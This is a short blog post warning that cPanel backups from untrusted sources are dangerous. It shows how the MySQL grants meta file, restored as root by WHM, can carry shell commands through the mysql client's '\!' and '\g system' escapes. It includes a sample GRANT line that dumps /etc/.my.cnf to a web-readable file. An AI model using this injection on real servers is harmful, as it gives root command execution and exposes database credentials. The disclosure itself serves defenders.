Don’t restore cPanel backup from untrusted source

In WHM, there is a feature  “restore account”  which is used to restore a full account backup. Normal users can generate the backup  from cPanel and  It contains all the information for an account including the files and  meta data.

One of the meta data items is MySQL grants which is located inside the backup file. When you are restoring the account using WHM UI or restorepkg command, the mysql meta file will be restored as root user.
Now you may be thinking that there’s nothing wrong, and everything looks normal. But this is really really bad because you can embed arbitrary commands in SQL files and those commands will execute when the file is restored as  root user. Let me explain it.

 

root@server1 [/home/prajith]# cat mysql.sql
\! id
root@server1 [/home/prajith]# mysql < mysql.sql
uid=0(root) gid=0(root) groups=0(root)
root@server1 [/home/prajith]

so we can insert any linux commands to mysql meta file and this will be execute as root while restoring the account.

Here is an example:

  GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*A4E12252EACEA5A79<XXXXX>E11D47296FE237D5897'\g system /etc/.my.cnf >> /tmp/test.txt;
GRANT ALL PRIVILEGES ON `whmtest\_pop`.* TO 'whmtest'@'localhost';

while restoring the account,  mysql will execute the linux commands using system function and the output will be saved to /tmp/test.txt and later we can read this file using http request. so don’t restore the backup from untrusted source 😀

Don’t restore cPanel backup from untrusted source

Leave a Reply

Your email address will not be published. Required fields are marked *

Fork me on GitHub